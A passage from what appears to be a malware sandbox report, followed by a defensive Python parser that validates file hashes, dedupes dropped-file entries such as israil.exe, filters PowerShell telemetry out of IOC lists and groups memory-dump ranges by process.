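Windows 7 adds little: resources.exe (PID 2244) crashed into WerFault.exe, launched from SysWOW64 and so handling a 32-bit process, and produced no network traffic, which leaves behavioral2 as the run to work from.

The parser below is an added example, not code from the report or the sandbox. It reads the listing format as printed here (a path line followed by MD5/SHA1/SHA256/SHA512 lines, or a memory/... dump name), validates digest lengths, collapses repeated entries per SHA256, tags host telemetry so it can be excluded from IOC output, and groups dump ranges across PIDs. The embedded sample reuses a few entries from the listings above; the telemetry markers, the classification names and the function names are our own choices.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied from this report's Files listings (paths,
# digests and dump names are the page's own; the selection and order are ours).
SAMPLE = r"""
memory/2784-0-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Public\Music\israil.exe
MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

C:\Users\Public\Music\israil.exe
MD5 b65cd9956dfe1877c72ffe687fc632b4
SHA1 86c1bc804f2394bb0b20fa7434257786eb72e5bf
SHA256 561d189fb1c2b89e27f0e4be57c4b16dbced1d1940712fed04adfc35d34b05a0
SHA512 fb2f44fa8821c9d5e048b74a17cdf2bd1a545e4c9c2af7a15ad50e53766c44e50d7dd1c805f0e88e7170f8ae43895977b96e6dec766225670a8e035cd421f4fd

memory/448-145-0x0000000000370000-0x0000000000378000-memory.dmp
memory/1496-4-0x0000000074D30000-0x00000000754E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 4a5d3690e2d2c1cb6b0e666c89394d91
SHA1 6c7fca08ea8804797332f735af5198c3db15352e
SHA256 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641
SHA512 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034

memory/448-515-0x0000000000400000-0x0000000000412000-memory.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9A-Fa-f]+)$")

# Files PowerShell and the CLR write about themselves on any host (our marker list):
# evidence that PowerShell / managed code ran, not payloads, so keep them out of IOC lists.
HOST_TELEMETRY = ("StartupProfileData-NonInteractive", "ModuleAnalysisCache",
                  "__PSScriptPolicyTest_", "\\UsageLogs\\")
DEFAULT_IMAGE_BASE = 0x400000   # default base of a 32-bit PE image


def parse_files_section(text):
    """Return (file_entries, memory_regions) from a Files listing in this format."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            start, end = int(m[3], 16), int(m[4], 16)
            regions.append({"pid": int(m[1]), "index": int(m[2]),
                            "start": start, "end": end, "size": end - start})
            current = None
            continue
        m = HASH_RE.match(line)
        if m:
            if current is None:
                raise ValueError(f"digest with no preceding path: {line}")
            algo, digest = m[1], m[2].lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} has {len(digest)} hex chars in {current['path']}")
            current[algo] = digest
            continue
        if "\\" not in line:            # section heading or stray text, not a path
            current = None
            continue
        current = {"path": line}
        files.append(current)
    return files, regions


def classify(path):
    """'host-telemetry', 'pe-drop', 'script-drop' or 'other' for a listed path."""
    if any(marker in path for marker in HOST_TELEMETRY):
        return "host-telemetry"
    name = path.rsplit("\\", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in ("exe", "dll", "scr"):
        return "pe-drop"
    if ext in ("bat", "cmd", "ps1", "vbs", "js"):
        return "script-drop"
    return "other"


def unique_drops(files):
    """Collapse repeated listings of the same digests into one record per SHA256."""
    seen = {}
    for f in files:
        digest = f.get("SHA256")
        if digest is None:
            raise ValueError(f"no SHA256 for {f['path']}")
        rec = seen.setdefault(digest, {**f, "kind": classify(f["path"]), "writes": 0})
        rec["writes"] += 1
    return list(seen.values())


def payload_iocs(drops):
    """Only the attacker-written executables and scripts, the entries worth blocking on."""
    return [d for d in drops if d["kind"] in ("pe-drop", "script-drop")]


def shared_regions(regions):
    """(start, end) ranges dumped from more than one PID: the same mapping seen across
    processes, which usually means a shared module rather than a payload."""
    by_range = defaultdict(set)
    for r in regions:
        by_range[(r["start"], r["end"])].add(r["pid"])
    return {rng: sorted(pids) for rng, pids in by_range.items() if len(pids) > 1}


def image_base_dumps(regions):
    """Dumps that start at the 32-bit default image base: (pid, index, size) tuples
    to inspect first when checking for a payload loaded over the process image."""
    return [(r["pid"], r["index"], r["size"]) for r in regions if r["start"] == DEFAULT_IMAGE_BASE]
```

On the embedded sample this yields two unique files from three listings (israil.exe recorded twice, so writes == 2, and one PowerShell telemetry file that payload_iocs drops), the 0x74D30000-0x754E0000 range shared by PIDs 1496 and 2784, and one image-base dump for PID 448 of 0x12000 bytes. The same functions run unchanged over the full listings above once they are pasted into a file.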